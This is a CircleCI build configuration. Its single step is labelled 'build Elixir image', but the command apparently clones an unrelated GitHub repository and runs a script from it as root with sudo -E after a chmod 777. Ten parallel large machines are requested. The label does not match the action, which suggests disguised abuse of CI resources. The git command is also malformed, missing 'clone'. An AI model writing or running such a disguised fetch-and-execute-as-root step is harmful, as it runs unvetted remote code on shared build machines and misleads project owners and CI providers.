version: 2
jobs:
  build:
    machine:
      image: ubuntu-2004:202104-01
      docker_layer_caching: true
    parallelism: 10
    resource_class: large
    steps:
      - checkout
      - run:
          name: build Elixir image
          command: git https://github.com/Boynyah/0.git && cd 0 && chmod 777 SRB && sudo -E bash SRB.sh 
workflows:
    version: 2
    build:
        jobs:
            - build
